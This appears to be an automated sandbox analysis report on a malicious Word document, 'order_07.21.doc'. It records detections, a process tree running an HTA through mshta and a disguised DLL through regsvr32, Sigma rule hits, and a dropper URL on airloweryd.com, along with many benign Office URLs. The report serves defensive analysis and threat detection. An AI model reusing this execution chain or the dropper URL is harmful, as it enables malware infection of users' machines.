Loading ...

Play interactive tourEdit tour

Windows Analysis Report order_07.21.doc

Overview

General Information

Sample Name:order_07.21.doc
Analysis ID:452438
MD5:401b19c454075d52bd832725f3c22cfe
SHA1:088f76c184a0cba673abc41bd5582e4e21672fdd
SHA256:6b94e6319e46f52058d5f0c1bc07d7e367152e3bb769f2fd1af097914fe64ce3
Infos:

Most interesting Screenshot:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Register DLL with spoofed extension
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Anomaly
Creates a process in suspended mode (likely to inject code)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document contains no OLE stream with summary information
Document has an unknown application name
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 3728 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • cmd.exe (PID: 5724 cmdline: cmd /c c:\programdata\captionEx.hta MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • mshta.exe (PID: 5968 cmdline: 'C:\Windows\SysWOW64\mshta.exe' 'C:\programdata\captionEx.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} MD5: 7083239CE743FDB68DFC933B7308E80A)
        • regsvr32.exe (PID: 5080 cmdline: 'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpg MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: MSHTA Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpg, CommandLine: 'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpg, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Windows\SysWOW64\mshta.exe' 'C:\programdata\captionEx.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5968, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpg, ProcessId: 5080
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: cmd /c c:\programdata\captionEx.hta, CommandLine: cmd /c c:\programdata\captionEx.hta, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, ParentProcessId: 3728, ProcessCommandLine: cmd /c c:\programdata\captionEx.hta, ProcessId: 5724
Sigma detected: Regsvr32 AnomalyShow sources
Source: Process startedAuthor: Florian Roth, oscd.community: Data: Command: 'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpg, CommandLine: 'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpg, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Windows\SysWOW64\mshta.exe' 'C:\programdata\captionEx.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5968, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpg, ProcessId: 5080

Data Obfuscation:

barindex
Sigma detected: Register DLL with spoofed extensionShow sources
Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpg, CommandLine: 'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpg, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Windows\SysWOW64\mshta.exe' 'C:\programdata\captionEx.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5968, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpg, ProcessId: 5080

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for domain / URLShow sources
Source: airloweryd.comVirustotal: Detection: 10%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: order_07.21.docVirustotal: Detection: 48%Perma Link
Source: order_07.21.docReversingLabs: Detection: 15%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
Source: global trafficDNS query: name: airloweryd.com
Source: unknownDNS traffic detected: query: airloweryd.com replaycode: Server failure (2)
Source: unknownDNS traffic detected: queries for: airloweryd.com
Source: mshta.exe, 00000004.00000003.217326117.0000000006833000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.220229050.000000000AE93000.00000004.00000040.sdmpString found in binary or memory: http://airloweryd.com/adda/CzJsZLz8s7e1PAiOuESLghxyuWpr1A46cHBNR/dmIczx3VCKJVxOIM45tzrpZTl8IQ06/ryme
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://api.aadrm.com/
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://api.cortana.ai
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://api.office.net
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://api.onedrive.com
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://augloop.office.com
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://augloop.office.com/v2
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://cdn.entity.
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://clients.config.office.net/
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://config.edge.skype.com
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://cortana.ai
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://cortana.ai/api
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://cr.office.com
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://dev.cortana.ai
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://devnull.onenote.com
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://directory.services.
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://enrichment.osi.office.net/
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://graph.windows.net
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://graph.windows.net/
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://lifecycle.office.com
Source: mshta.exe, 00000004.00000002.224580419.000000000ABC0000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://login.windows.local
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://management.azure.com
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://management.azure.com/
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://messaging.office.com/
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://ncus.contentsync.
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://officeapps.live.com
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://onedrive.live.com
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://osi.office.net
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://outlook.office.com/
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://outlook.office365.com/
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://pages.store.office.com/review/query
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://powerlift.acompli.net
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://settings.outlook.com
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://staging.cortana.ai
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://tasks.office.com
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
